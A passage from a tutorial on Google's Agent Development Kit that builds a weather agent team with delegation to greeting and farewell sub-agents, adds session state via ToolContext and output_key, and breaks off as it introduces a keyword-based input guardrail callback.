In Steps 1 and 2, we built and experimented with a single agent focused solely on weather lookups. While effective for its specific task, real-world applications often involve handling a wider variety of user interactions. We *could* keep adding more tools and complex instructions to our single weather agent, but this can quickly become unmanageable and less efficient.

A more robust approach is to build an **Agent Team**. This involves:

1. Creating multiple, **specialized agents**, each designed for a specific capability (e.g., one for weather, one for greetings, one for calculations).
1. Designating a **root agent** (or orchestrator) that receives the initial user request.
1. Enabling the root agent to **delegate** the request to the most appropriate specialized sub-agent based on the user's intent.

**Why build an Agent Team?**

- **Modularity:** Easier to develop, test, and maintain individual agents.
- **Specialization:** Each agent can be tailored (instructions, model choice) to its specific task.
- **Scalability:** Simpler to add new capabilities by adding new agents.
- **Efficiency:** Allows using potentially simpler/cheaper models for simpler tasks (like greetings).

**In this step, we will:**

1. Define simple tools for handling greetings (`say_hello`) and farewells (`say_goodbye`).
1. Create two new specialized sub-agents: `greeting_agent` and `farewell_agent`.
1. Update our main weather agent (`weather_agent_v2`) to act as the **root agent**.
1. Configure the root agent with its sub-agents, enabling **automatic delegation**.
1. Test the delegation flow by sending different types of requests to the root agent.

______________________________________________________________________

**1. Define Tools for Sub-Agents**

First, let's create the simple Python functions that will serve as tools for our new specialist agents. Remember, clear docstrings are vital for the agents that will use them.

```python
# @title Define Tools for Greeting and Farewell Agents
from typing import Optional  # Make sure to import Optional

# Ensure 'get_weather' from Step 1 is available if running this step independently.
# def get_weather(city: str) -> dict: ... (from Step 1)

def say_hello(name: Optional[str] = None) -> str:
    """Provides a simple greeting. If a name is provided, it will be used.

    Args:
        name (str, optional): The name of the person to greet. Defaults to a generic greeting if not provided.

    Returns:
        str: A friendly greeting message.
    """
    if name:
        greeting = f"Hello, {name}!"
        print(f"--- Tool: say_hello called with name: {name} ---")
    else:
        greeting = "Hello there!"  # Default greeting if name is None or not explicitly passed
        print(f"--- Tool: say_hello called without a specific name (name_arg_value: {name}) ---")
    return greeting

def say_goodbye() -> str:
    """Provides a simple farewell message to conclude the conversation."""
    print("--- Tool: say_goodbye called ---")
    return "Goodbye! Have a great day."

print("Greeting and Farewell tools defined.")

# Optional self-test
print(say_hello("Alice"))
print(say_hello())           # Test with no argument (should use default "Hello there!")
print(say_hello(name=None))  # Test with name explicitly as None (should use default "Hello there!")
```

______________________________________________________________________

**2. Define the Sub-Agents (Greeting & Farewell)**

Now, create the `Agent` instances for our specialists. Notice their highly focused `instruction` and, critically, their clear `description`. The `description` is the primary information the *root agent* uses to decide *when* to delegate to these sub-agents.

**Best Practice:** Sub-agent `description` fields should accurately and concisely summarize their specific capability. This is crucial for effective automatic delegation.

**Best Practice:** Sub-agent `instruction` fields should be tailored to their limited scope, telling them exactly what to do and *what not* to do (e.g., "Your *only* task is...").

```python
# @title Define Greeting and Farewell Sub-Agents

# If you want to use models other than Gemini, ensure LiteLlm is imported and API keys are set (from Step 0/2)
# from google.adk.models.lite_llm import LiteLlm
# MODEL_GPT_4O, MODEL_CLAUDE_SONNET etc. should be defined
# Or else, continue to use: model = MODEL_GEMINI_2_5_FLASH

# --- Greeting Agent ---
greeting_agent = None
try:
    greeting_agent = Agent(
        # Using a potentially different/cheaper model for a simple task
        model=MODEL_GEMINI_2_5_FLASH,
        # model=LiteLlm(model=MODEL_GPT_4O), # If you would like to experiment with other models
        name="greeting_agent",
        instruction="You are the Greeting Agent. Your ONLY task is to provide a friendly greeting to the user. "
                    "Use the 'say_hello' tool to generate the greeting. "
                    "If the user provides their name, make sure to pass it to the tool. "
                    "Do not engage in any other conversation or tasks.",
        description="Handles simple greetings and hellos using the 'say_hello' tool.",  # Crucial for delegation
        tools=[say_hello],
    )
    print(f"✅ Agent '{greeting_agent.name}' created using model '{greeting_agent.model}'.")
except Exception as e:
    # greeting_agent is still None here, so report the model constant instead of greeting_agent.model
    print(f"❌ Could not create Greeting agent. Check API Key ({MODEL_GEMINI_2_5_FLASH}). Error: {e}")

# --- Farewell Agent ---
farewell_agent = None
try:
    farewell_agent = Agent(
        # Can use the same or a different model
        model=MODEL_GEMINI_2_5_FLASH,
        # model=LiteLlm(model=MODEL_GPT_4O), # If you would like to experiment with other models
        name="farewell_agent",
        instruction="You are the Farewell Agent. Your ONLY task is to provide a polite goodbye message. "
                    "Use the 'say_goodbye' tool when the user indicates they are leaving or ending the conversation "
                    "(e.g., using words like 'bye', 'goodbye', 'thanks bye', 'see you'). "
                    "Do not perform any other actions.",
        description="Handles simple farewells and goodbyes using the 'say_goodbye' tool.",  # Crucial for delegation
        tools=[say_goodbye],
    )
    print(f"✅ Agent '{farewell_agent.name}' created using model '{farewell_agent.model}'.")
except Exception as e:
    # farewell_agent is still None here, so report the model constant instead of farewell_agent.model
    print(f"❌ Could not create Farewell agent. Check API Key ({MODEL_GEMINI_2_5_FLASH}). Error: {e}")
```

______________________________________________________________________

**3. Define the Root Agent (Weather Agent v2) with Sub-Agents**

Now, we upgrade our `weather_agent`. The key changes are:

- Adding the `sub_agents` parameter: We pass a list containing the `greeting_agent` and `farewell_agent` instances we just created.
- Updating the `instruction`: We explicitly tell the root agent *about* its sub-agents and *when* it should delegate tasks to them.

**Key Concept: Automatic Delegation (Auto Flow)** By providing the `sub_agents` list, ADK enables automatic delegation.
When the root agent receives a user query, its LLM considers not only its own instructions and tools but also the `description` of each sub-agent. If the LLM determines that a query aligns better with a sub-agent's described capability (e.g., "Handles simple greetings"), it will automatically generate a special internal action to *transfer control* to that sub-agent for that turn. The sub-agent then processes the query using its own model, instructions, and tools.

**Best Practice:** Ensure the root agent's instructions clearly guide its delegation decisions. Mention the sub-agents by name and describe the conditions under which delegation should occur.

```python
# @title Define the Root Agent with Sub-Agents

# Ensure sub-agents were created successfully before defining the root agent.
# Also ensure the original 'get_weather' tool is defined.
weather_agent_team = None  # Initialize so later cells can check whether creation succeeded
runner_root = None         # Initialize runner

if greeting_agent and farewell_agent and 'get_weather' in globals():
    # Let's use a capable Gemini model for the root agent to handle orchestration
    root_agent_model = MODEL_GEMINI_2_5_FLASH

    weather_agent_team = Agent(
        name="weather_agent_v2",  # Give it a new version name
        model=root_agent_model,
        description="The main coordinator agent. Handles weather requests and delegates greetings/farewells to specialists.",
        instruction="You are the main Weather Agent coordinating a team. Your primary responsibility is to provide weather information. "
                    "Use the 'get_weather' tool ONLY for specific weather requests (e.g., 'weather in London'). "
                    "You have specialized sub-agents: "
                    "1. 'greeting_agent': Handles simple greetings like 'Hi', 'Hello'. Delegate to it for these. "
                    "2. 'farewell_agent': Handles simple farewells like 'Bye', 'See you'. Delegate to it for these. "
                    "Analyze the user's query. If it's a greeting, delegate to 'greeting_agent'. If it's a farewell, delegate to 'farewell_agent'. "
                    "If it's a weather request, handle it yourself using 'get_weather'. "
                    "For anything else, respond appropriately or state you cannot handle it.",
        tools=[get_weather],  # Root agent still needs the weather tool for its core task
        # Key change: Link the sub-agents here!
        sub_agents=[greeting_agent, farewell_agent]
    )
    print(f"✅ Root Agent '{weather_agent_team.name}' created using model '{root_agent_model}' with sub-agents: {[sa.name for sa in weather_agent_team.sub_agents]}")

else:
    print("❌ Cannot create root agent because one or more sub-agents failed to initialize or 'get_weather' tool is missing.")
    if not greeting_agent: print(" - Greeting Agent is missing.")
    if not farewell_agent: print(" - Farewell Agent is missing.")
    if 'get_weather' not in globals(): print(" - get_weather function is missing.")
```

______________________________________________________________________

**4. Interact with the Agent Team**

Now that we've defined our root agent (`weather_agent_team`, created in the previous code block) with its specialized sub-agents, let's test the delegation mechanism. If you named the root agent `root_agent` instead, the code below detects that name as well.

The following code block will:

1. Define an `async` function `run_team_conversation`.
1. Inside this function, create a *new, dedicated* `InMemorySessionService` and a specific session (`session_001_agent_team`) just for this test run. This isolates the conversation history for testing the team dynamics.
1. Create a `Runner` (`runner_agent_team`) configured to use our `weather_agent_team` (the root agent) and the dedicated session service.
1. Use our updated `call_agent_async` function to send different types of queries (greeting, weather request, farewell) to the `runner_agent_team`. We explicitly pass the runner, user ID, and session ID for this specific test.
1. Immediately execute the `run_team_conversation` function.

We expect the following flow:

1. The "Hello there!" query goes to `runner_agent_team`.
1. The root agent (`weather_agent_team`) receives it and, based on its instructions and the `greeting_agent`'s description, delegates the task.
1. `greeting_agent` handles the query, calls its `say_hello` tool, and generates the response.
1. The "What is the weather in New York?" query is *not* delegated and is handled directly by the root agent using its `get_weather` tool.
1. The "Thanks, bye!" query is delegated to the `farewell_agent`, which uses its `say_goodbye` tool.

```python
# @title Interact with the Agent Team
import asyncio  # Ensure asyncio is imported

# Ensure the root agent (e.g., 'weather_agent_team' or 'root_agent' from the previous cell) is defined.
# Ensure the call_agent_async function is defined.

# Check if the root agent variable exists before defining the conversation function
root_agent_var_name = 'root_agent'  # Default name from Step 3 guide
if 'weather_agent_team' in globals():  # Check if user used this name instead
    root_agent_var_name = 'weather_agent_team'
elif 'root_agent' not in globals():
    print("⚠️ Root agent ('root_agent' or 'weather_agent_team') not found. Cannot define run_team_conversation.")
    # Assign a dummy value to prevent NameError later if the code block runs anyway
    root_agent = None  # Or set a flag to prevent execution

# Only define and run if the root agent exists
if root_agent_var_name in globals() and globals()[root_agent_var_name]:
    # Define the main async function for the conversation logic.
    # The 'await' keywords INSIDE this function are necessary for async operations.
    async def run_team_conversation():
        print("\n--- Testing Agent Team Delegation ---")
        session_service = InMemorySessionService()
        APP_NAME = "weather_tutorial_agent_team"
        USER_ID = "user_1_agent_team"
        SESSION_ID = "session_001_agent_team"
        session = await session_service.create_session(
            app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
        )
        print(f"Session created: App='{APP_NAME}', User='{USER_ID}', Session='{SESSION_ID}'")

        actual_root_agent = globals()[root_agent_var_name]
        runner_agent_team = Runner(  # Or use InMemoryRunner
            agent=actual_root_agent,
            app_name=APP_NAME,
            session_service=session_service
        )
        print(f"Runner created for agent '{actual_root_agent.name}'.")

        # --- Interactions using await (correct within async def) ---
        await call_agent_async(query="Hello there!",
                               runner=runner_agent_team,
                               user_id=USER_ID,
                               session_id=SESSION_ID)
        await call_agent_async(query="What is the weather in New York?",
                               runner=runner_agent_team,
                               user_id=USER_ID,
                               session_id=SESSION_ID)
        await call_agent_async(query="Thanks, bye!",
                               runner=runner_agent_team,
                               user_id=USER_ID,
                               session_id=SESSION_ID)

    # --- Execute the `run_team_conversation` async function ---
    # Choose ONE of the methods below based on your environment.
    # Note: This may require API keys for the models used!

    # METHOD 1: Direct await (Default for Notebooks/Async REPLs)
    # If your environment supports top-level await (like Colab/Jupyter notebooks),
    # it means an event loop is already running, so you can directly await the function.
    print("Attempting execution using 'await' (default for notebooks)...")
    await run_team_conversation()

    # METHOD 2: asyncio.run (For Standard Python Scripts [.py])
    # If running this code as a standard Python script from your terminal,
    # the script context is synchronous. `asyncio.run()` is needed to
    # create and manage an event loop to execute your async function.
    # To use this method:
    # 1. Comment out the `await run_team_conversation()` line above.
    # 2. Uncomment the following block:
    """
    import asyncio
    if __name__ == "__main__": # Ensures this runs only when script is executed directly
        print("Executing using 'asyncio.run()' (for standard Python scripts)...")
        try:
            # This creates an event loop, runs your async function, and closes the loop.
            asyncio.run(run_team_conversation())
        except Exception as e:
            print(f"An error occurred: {e}")
    """

else:
    # This message prints if the root agent variable wasn't found earlier
    print("\n⚠️ Skipping agent team conversation execution as the root agent was not successfully defined in a previous step.")
```

______________________________________________________________________

Look closely at the output logs, especially the `--- Tool: ... called ---` messages. You should observe:

- For "Hello there!", the `say_hello` tool was called (indicating `greeting_agent` handled it).
- For "What is the weather in New York?", the `get_weather` tool was called (indicating the root agent handled it).
- For "Thanks, bye!", the `say_goodbye` tool was called (indicating `farewell_agent` handled it).

This confirms successful **automatic delegation**! The root agent, guided by its instructions and the `description`s of its `sub_agents`, correctly routed user requests to the appropriate specialist agent within the team.

You've now structured your application with multiple collaborating agents. This modular design is fundamental for building more complex and capable agent systems. In the next step, we'll give our agents the ability to remember information across turns using session state.

## Step 4: Adding Memory and Personalization with Session State

So far, our agent team can handle different tasks through delegation, but each interaction starts fresh: the agents have no memory of past conversations or user preferences within a session. To create more sophisticated and context-aware experiences, agents need **memory**. ADK provides this through **Session State**.
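To make the idea of per-session memory concrete before turning to ADK's own API, here is a minimal plain-Python sketch. `ToySession`, `ToySessionStore`, and `handle_turn` are hypothetical names invented for this illustration and are not part of ADK; the sketch only assumes that state is a dictionary looked up by an (app, user, session) triple and shared by every turn in that session.

```python
from dataclasses import dataclass, field
from typing import Dict, Tuple


@dataclass
class ToySession:
    """Hypothetical stand-in for a session: an ID triple plus a state dict."""
    app_name: str
    user_id: str
    session_id: str
    state: dict = field(default_factory=dict)


class ToySessionStore:
    """Hypothetical in-memory store keyed by (app_name, user_id, session_id)."""

    def __init__(self) -> None:
        self._sessions: Dict[Tuple[str, str, str], ToySession] = {}

    def get_or_create(self, app_name: str, user_id: str, session_id: str) -> ToySession:
        key = (app_name, user_id, session_id)
        if key not in self._sessions:
            self._sessions[key] = ToySession(app_name, user_id, session_id)
        return self._sessions[key]


def handle_turn(session: ToySession, message: str) -> str:
    """Toy 'agent turn': stores a unit preference, or reads it back with a default."""
    prefix = "use "
    if message.startswith(prefix):
        unit = message[len(prefix):].strip()
        session.state["temperature_unit"] = unit  # write to state
        return f"OK, I'll report temperatures in {unit}."
    # Read with .get() so a missing key falls back to a default instead of raising
    unit = session.state.get("temperature_unit", "Celsius")
    return f"Reporting in {unit}."


store = ToySessionStore()
session = store.get_or_create("demo_app", "user_1", "session_1")
print(handle_turn(session, "weather?"))        # nothing stored yet, default is used
print(handle_turn(session, "use Fahrenheit"))  # preference saved into state
print(handle_turn(session, "weather?"))        # later turn sees the saved preference
```

The point of the sketch is only the shape of the mechanism: a later turn in the same session sees what an earlier turn wrote, while a different session ID starts with empty state.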
**What is Session State?**

- It's a Python dictionary (`session.state`) tied to a specific user session (identified by `APP_NAME`, `USER_ID`, `SESSION_ID`).
- It persists information *across multiple conversational turns* within that session.
- Agents and Tools can read from and write to this state, allowing them to remember details, adapt behavior, and personalize responses.

**How Agents Interact with State:**

1. **`ToolContext` (Primary Method):** Tools can accept a `ToolContext` object (automatically provided by ADK if declared as the last argument). This object gives direct access to the session state via `tool_context.state`, allowing tools to read preferences or save results *during* execution.
1. **`output_key` (Auto-Save Agent Response):** An `Agent` can be configured with an `output_key="your_key"`. ADK will then automatically save the agent's final textual response for a turn into `session.state["your_key"]`.

**In this step, we will enhance our Weather Bot team by:**

1. Using a **new** `InMemorySessionService` to demonstrate state in isolation.
1. Initializing session state with a user preference for `temperature_unit`.
1. Creating a state-aware version of the weather tool (`get_weather_stateful`) that reads this preference via `ToolContext` and adjusts its output format (Celsius/Fahrenheit).
1. Updating the root agent to use this stateful tool and configuring it with an `output_key` to automatically save its final weather report to the session state.
1. Running a conversation to observe how the initial state affects the tool, how manual state changes alter subsequent behavior, and how `output_key` persists the agent's response.

______________________________________________________________________

**1. Initialize New Session Service and State**

To clearly demonstrate state management without interference from prior steps, we'll instantiate a new `InMemorySessionService`.
We'll also create a session with an initial state defining the user's preferred temperature unit.

```python
# @title 1. Initialize New Session Service and State

# Import necessary session components
from google.adk.sessions import InMemorySessionService

# Create a NEW session service instance for this state demonstration
session_service_stateful = InMemorySessionService()
print("✅ New InMemorySessionService created for state demonstration.")

# Define a NEW session ID for this part of the tutorial
SESSION_ID_STATEFUL = "session_state_demo_001"
USER_ID_STATEFUL = "user_state_demo"

# Define initial state data - user prefers Celsius initially
initial_state = {
    "user_preference_temperature_unit": "Celsius"
}

# Create the session, providing the initial state
session_stateful = await session_service_stateful.create_session(
    app_name=APP_NAME,  # Use the consistent app name
    user_id=USER_ID_STATEFUL,
    session_id=SESSION_ID_STATEFUL,
    state=initial_state  # <<< Initialize state during creation
)
print(f"✅ Session '{SESSION_ID_STATEFUL}' created for user '{USER_ID_STATEFUL}'.")

# Verify the initial state was set correctly
retrieved_session = await session_service_stateful.get_session(app_name=APP_NAME,
                                                               user_id=USER_ID_STATEFUL,
                                                               session_id=SESSION_ID_STATEFUL)
print("\n--- Initial Session State ---")
if retrieved_session:
    print(retrieved_session.state)
else:
    print("Error: Could not retrieve session.")
```

______________________________________________________________________

**2. Create State-Aware Weather Tool (`get_weather_stateful`)**

Now, we create a new version of the weather tool. Its key feature is accepting `tool_context: ToolContext` which allows it to access `tool_context.state`. It will read the `user_preference_temperature_unit` and format the temperature accordingly.

- **Key Concept: `ToolContext`** This object is the bridge allowing your tool logic to interact with the session's context, including reading and writing state variables.
ADK injects it automatically if defined as the last parameter of your tool function.
- **Best Practice:** When reading from state, use `dictionary.get('key', default_value)` to handle cases where the key might not exist yet, ensuring your tool doesn't crash.

```python
from google.adk.tools.tool_context import ToolContext

def get_weather_stateful(city: str, tool_context: ToolContext) -> dict:
    """Retrieves weather, converts temp unit based on session state."""
    print(f"--- Tool: get_weather_stateful called for {city} ---")

    # --- Read preference from state ---
    preferred_unit = tool_context.state.get("user_preference_temperature_unit", "Celsius")  # Default to Celsius
    print(f"--- Tool: Reading state 'user_preference_temperature_unit': {preferred_unit} ---")

    city_normalized = city.lower().replace(" ", "")

    # Mock weather data (always stored in Celsius internally)
    mock_weather_db = {
        "newyork": {"temp_c": 25, "condition": "sunny"},
        "london": {"temp_c": 15, "condition": "cloudy"},
        "tokyo": {"temp_c": 18, "condition": "light rain"},
    }

    if city_normalized in mock_weather_db:
        data = mock_weather_db[city_normalized]
        temp_c = data["temp_c"]
        condition = data["condition"]

        # Format temperature based on state preference
        if preferred_unit == "Fahrenheit":
            temp_value = (temp_c * 9/5) + 32  # Calculate Fahrenheit
            temp_unit = "°F"
        else:  # Default to Celsius
            temp_value = temp_c
            temp_unit = "°C"

        report = f"The weather in {city.capitalize()} is {condition} with a temperature of {temp_value:.0f}{temp_unit}."
        result = {"status": "success", "report": report}
        print(f"--- Tool: Generated report in {preferred_unit}. Result: {result} ---")

        # Example of writing back to state (optional for this tool)
        tool_context.state["last_city_checked_stateful"] = city
        print(f"--- Tool: Updated state 'last_city_checked_stateful': {city} ---")

        return result
    else:
        # Handle city not found
        error_msg = f"Sorry, I don't have weather information for '{city}'."
        print(f"--- Tool: City '{city}' not found. ---")
        return {"status": "error", "error_message": error_msg}

print("✅ State-aware 'get_weather_stateful' tool defined.")
```

______________________________________________________________________

**3. Redefine Sub-Agents and Update Root Agent**

To ensure this step is self-contained and builds correctly, we first redefine the `greeting_agent` and `farewell_agent` exactly as they were in Step 3. Then, we define our new root agent (`weather_agent_v4_stateful`):

- It uses the new `get_weather_stateful` tool.
- It includes the greeting and farewell sub-agents for delegation.
- **Crucially**, it sets `output_key="last_weather_report"` which automatically saves its final weather response to the session state.

```python
# @title 3. Redefine Sub-Agents and Update Root Agent with output_key

# Ensure necessary imports: Agent, LiteLlm, Runner
from google.adk.agents import Agent
from google.adk.models.lite_llm import LiteLlm
from google.adk.runners import Runner
# Ensure tools 'say_hello', 'say_goodbye' are defined (from Step 3)
# Ensure model constants MODEL_GPT_4O, MODEL_GEMINI_2_5_FLASH etc. are defined

# --- Redefine Greeting Agent (from Step 3) ---
greeting_agent = None
try:
    greeting_agent = Agent(
        model=MODEL_GEMINI_2_5_FLASH,
        name="greeting_agent",
        instruction="You are the Greeting Agent. Your ONLY task is to provide a friendly greeting using the 'say_hello' tool. Do nothing else.",
        description="Handles simple greetings and hellos using the 'say_hello' tool.",
        tools=[say_hello],
    )
    print(f"✅ Agent '{greeting_agent.name}' redefined.")
except Exception as e:
    print(f"❌ Could not redefine Greeting agent. Error: {e}")

# --- Redefine Farewell Agent (from Step 3) ---
farewell_agent = None
try:
    farewell_agent = Agent(
        model=MODEL_GEMINI_2_5_FLASH,
        name="farewell_agent",
        instruction="You are the Farewell Agent. Your ONLY task is to provide a polite goodbye message using the 'say_goodbye' tool. Do not perform any other actions.",
        description="Handles simple farewells and goodbyes using the 'say_goodbye' tool.",
        tools=[say_goodbye],
    )
    print(f"✅ Agent '{farewell_agent.name}' redefined.")
except Exception as e:
    print(f"❌ Could not redefine Farewell agent. Error: {e}")

# --- Define the Updated Root Agent ---
root_agent_stateful = None
runner_root_stateful = None  # Initialize runner

# Check prerequisites before creating the root agent
if greeting_agent and farewell_agent and 'get_weather_stateful' in globals():

    root_agent_model = MODEL_GEMINI_2_5_FLASH  # Choose orchestration model

    root_agent_stateful = Agent(
        name="weather_agent_v4_stateful",  # New version name
        model=root_agent_model,
        description="Main agent: Provides weather (state-aware unit), delegates greetings/farewells, saves report to state.",
        instruction="You are the main Weather Agent. Your job is to provide weather using 'get_weather_stateful'. "
                    "The tool will format the temperature based on user preference stored in state. "
                    "Delegate simple greetings to 'greeting_agent' and farewells to 'farewell_agent'. "
                    "Handle only weather requests, greetings, and farewells.",
        tools=[get_weather_stateful],  # Use the state-aware tool
        sub_agents=[greeting_agent, farewell_agent],  # Include sub-agents
        output_key="last_weather_report"  # <<< Auto-save agent's final weather response
    )
    print(f"✅ Root Agent '{root_agent_stateful.name}' created using stateful tool and output_key.")

    # --- Create Runner for this Root Agent & NEW Session Service ---
    runner_root_stateful = Runner(
        agent=root_agent_stateful,
        app_name=APP_NAME,
        session_service=session_service_stateful  # Use the NEW stateful session service
    )
    print(f"✅ Runner created for stateful root agent '{runner_root_stateful.agent.name}' using stateful session service.")

else:
    print("❌ Cannot create stateful root agent. Prerequisites missing.")
    if not greeting_agent: print(" - greeting_agent definition missing.")
    if not farewell_agent: print(" - farewell_agent definition missing.")
    if 'get_weather_stateful' not in globals(): print(" - get_weather_stateful tool missing.")
```

______________________________________________________________________

**4. Interact and Test State Flow**

Now, let's execute a conversation designed to test the state interactions using the `runner_root_stateful` (associated with our stateful agent and the `session_service_stateful`). We'll use the `call_agent_async` function defined earlier, ensuring we pass the correct runner, user ID (`USER_ID_STATEFUL`), and session ID (`SESSION_ID_STATEFUL`).

The conversation flow will be:

1. **Check weather (London):** The `get_weather_stateful` tool should read the initial "Celsius" preference from the session state initialized in Section 1. The root agent's final response (the weather report in Celsius) should get saved to `state['last_weather_report']` via the `output_key` configuration.
1. **Manually update state:** We will *directly modify* the state stored within the `InMemorySessionService` instance (`session_service_stateful`).
   - **Why direct modification?** The `session_service.get_session()` method returns a *copy* of the session. Modifying that copy wouldn't affect the state used in subsequent agent runs. For this testing scenario with `InMemorySessionService`, we access the internal `sessions` dictionary to change the *actual* stored state value for `user_preference_temperature_unit` to "Fahrenheit". *Note: In real applications, state changes are typically triggered by tools or agent logic returning `EventActions(state_delta=...)`, not direct manual updates.*
1. **Check weather again (New York):** The `get_weather_stateful` tool should now read the updated "Fahrenheit" preference from the state and convert the temperature accordingly.
The root agent's *new* response (weather in Fahrenheit) will overwrite the previous value in `state['last_weather_report']` due to the `output_key`. 1. **Greet the agent:** Verify that delegation to the `greeting_agent` still works correctly alongside the stateful operations. This interaction will become the *last* response saved by `output_key` in this specific sequence. 1. **Inspect final state:** After the conversation, we retrieve the session one last time (getting a copy) and print its state to confirm the `user_preference_temperature_unit` is indeed "Fahrenheit", observe the final value saved by `output_key` (which will be the greeting in this run), and see the `last_city_checked_stateful` value written by the tool. ```python # @title 4. Interact to Test State Flow and output_key import asyncio # Ensure asyncio is imported # Ensure the stateful runner (runner_root_stateful) is available from the previous cell # Ensure call_agent_async, USER_ID_STATEFUL, SESSION_ID_STATEFUL, APP_NAME are defined if 'runner_root_stateful' in globals() and runner_root_stateful: # Define the main async function for the stateful conversation logic. # The 'await' keywords INSIDE this function are necessary for async operations. async def run_stateful_conversation(): print("\n--- Testing State: Temp Unit Conversion & output_key ---") # 1. Check weather (Uses initial state: Celsius) print("--- Turn 1: Requesting weather in London (expect Celsius) ---") await call_agent_async(query= "What's the weather in London?", runner=runner_root_stateful, user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL ) # 2. 
Manually update state preference to Fahrenheit - DIRECTLY MODIFY STORAGE print("\n--- Manually Updating State: Setting unit to Fahrenheit ---") try: # Access the internal storage directly - THIS IS SPECIFIC TO InMemorySessionService for testing # NOTE: In production with persistent services (Database, VertexAI), you would # typically update state via agent actions or specific service APIs if available, # not by direct manipulation of internal storage. stored_session = session_service_stateful.sessions[APP_NAME][USER_ID_STATEFUL][SESSION_ID_STATEFUL] stored_session.state["user_preference_temperature_unit"] = "Fahrenheit" # Optional: You might want to update the timestamp as well if any logic depends on it # import time # stored_session.last_update_time = time.time() print(f"--- Stored session state updated. Current 'user_preference_temperature_unit': {stored_session.state.get('user_preference_temperature_unit', 'Not Set')} ---") # Added .get for safety except KeyError: print(f"--- Error: Could not retrieve session '{SESSION_ID_STATEFUL}' from internal storage for user '{USER_ID_STATEFUL}' in app '{APP_NAME}' to update state. Check IDs and if session was created. ---") except Exception as e: print(f"--- Error updating internal session state: {e} ---") # 3. Check weather again (Tool should now use Fahrenheit) # This will also update 'last_weather_report' via output_key print("\n--- Turn 2: Requesting weather in New York (expect Fahrenheit) ---") await call_agent_async(query= "Tell me the weather in New York.", runner=runner_root_stateful, user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL ) # 4. 
Test basic delegation (should still work) # This will update 'last_weather_report' again, overwriting the NY weather report print("\n--- Turn 3: Sending a greeting ---") await call_agent_async(query= "Hi!", runner=runner_root_stateful, user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL ) # --- Execute the `run_stateful_conversation` async function --- # Choose ONE of the methods below based on your environment. # METHOD 1: Direct await (Default for Notebooks/Async REPLs) # If your environment supports top-level await (like Colab/Jupyter notebooks), # it means an event loop is already running, so you can directly await the function. print("Attempting execution using 'await' (default for notebooks)...") await run_stateful_conversation() # METHOD 2: asyncio.run (For Standard Python Scripts [.py]) # If running this code as a standard Python script from your terminal, # the script context is synchronous. `asyncio.run()` is needed to # create and manage an event loop to execute your async function. # To use this method: # 1. Comment out the `await run_stateful_conversation()` line above. # 2. Uncomment the following block: """ import asyncio if __name__ == "__main__": # Ensures this runs only when script is executed directly print("Executing using 'asyncio.run()' (for standard Python scripts)...") try: # This creates an event loop, runs your async function, and closes the loop. asyncio.run(run_stateful_conversation()) except Exception as e: print(f"An error occurred: {e}") """ # --- Inspect final session state after the conversation --- # This block runs after either execution method completes. 
print("\n--- Inspecting Final Session State ---") final_session = await session_service_stateful.get_session(app_name=APP_NAME, user_id= USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL) if final_session: # Use .get() for safer access to potentially missing keys print(f"Final Preference: {final_session.state.get('user_preference_temperature_unit', 'Not Set')}") print(f"Final Last Weather Report (from output_key): {final_session.state.get('last_weather_report', 'Not Set')}") print(f"Final Last City Checked (by tool): {final_session.state.get('last_city_checked_stateful', 'Not Set')}") # Print full state for detailed view # print(f"Full State Dict: {final_session.state}") # For detailed view else: print("\n❌ Error: Could not retrieve final session state.") else: print("\n⚠️ Skipping state test conversation. Stateful root agent runner ('runner_root_stateful') is not available.") ``` ______________________________________________________________________ By reviewing the conversation flow and the final session state printout, you can confirm: - **State Read:** The weather tool (`get_weather_stateful`) correctly read `user_preference_temperature_unit` from state, initially using "Celsius" for London. - **State Update:** The direct modification successfully changed the stored preference to "Fahrenheit". - **State Read (Updated):** The tool subsequently read "Fahrenheit" when asked for New York's weather and performed the conversion. - **Tool State Write:** The tool successfully wrote the `last_city_checked_stateful` ("New York" after the second weather check) into the state via `tool_context.state`. - **Delegation:** The delegation to the `greeting_agent` for "Hi!" functioned correctly even after state modifications. - **`output_key`:** The `output_key="last_weather_report"` successfully saved the root agent's *final* response for *each turn* where the root agent was the one ultimately responding. 
In this sequence, the last response was the greeting ("Hello, there!"), which overwrote the weather report in the state key. - **Final State:** The final check confirms the preference persisted as "Fahrenheit". You've now successfully integrated session state to personalize agent behavior using `ToolContext`, manually modified the state stored in `InMemorySessionService` for testing, and observed how `output_key` provides a simple mechanism for saving the agent's last response to state. This foundational understanding of state management is key as we proceed to implement safety guardrails using callbacks in the next steps. ______________________________________________________________________ ## Step 5: Adding Safety - Input Guardrail with `before_model_callback` Our agent team is becoming more capable, remembering preferences and using tools effectively. However, in real-world scenarios, we often need safety mechanisms to control the agent's behavior *before* potentially problematic requests even reach the core Large Language Model (LLM). ADK provides **Callbacks** – functions that allow you to hook into specific points in the agent's execution lifecycle. The `before_model_callback` is particularly useful for input safety. **What is `before_model_callback`?** - It's a Python function you define that ADK executes *just before* an agent sends its compiled request (including conversation history, instructions, and the latest user message) to the underlying LLM. - **Purpose:** Inspect the request, modify it if necessary, or block it entirely based on predefined rules. **Common Use Cases:** - **Input Validation/Filtering:** Check if user input meets criteria or contains disallowed content (like PII or keywords). - **Guardrails:** Prevent harmful, off-topic, or policy-violating requests from being processed by the LLM. - **Dynamic Prompt Modification:** Add timely information (e.g., from session state) to the LLM request context just before sending. **How it Works:** 1.
Define a function accepting `callback_context: CallbackContext` and `llm_request: LlmRequest`. - `callback_context`: Provides access to agent info, session state (`callback_context.state`), etc. - `llm_request`: Contains the full payload intended for the LLM (`contents`, `config`). 1. Inside the function: - **Inspect:** Examine `llm_request.contents` (especially the last user message). - **Modify (Use Caution):** You *can* change parts of `llm_request`. - **Block (Guardrail):** Return an `LlmResponse` object. ADK will send this response back immediately, *skipping* the LLM call for that turn. - **Allow:** Return `None`. ADK proceeds to call the LLM with the (potentially modified) request. **In this step, we will:** 1. Define a `before_model_callback` function (`block_keyword_guardrail`) that checks the user's input for a specific keyword ("BLOCK"). 1. Update our stateful root agent (`weather_agent_v4_stateful` from Step 4) to use this callback. 1. Create a new runner associated with this updated agent but using the *same stateful session service* to maintain state continuity. 1. Test the guardrail by sending both normal and keyword-containing requests. ______________________________________________________________________ **1. Define the Guardrail Callback Function** This function will inspect the last user message within the `llm_request` content. If it finds "BLOCK" (case-insensitive), it constructs and returns an `LlmResponse` to block the flow; otherwise, it returns `None`. ```python # @title 1. 
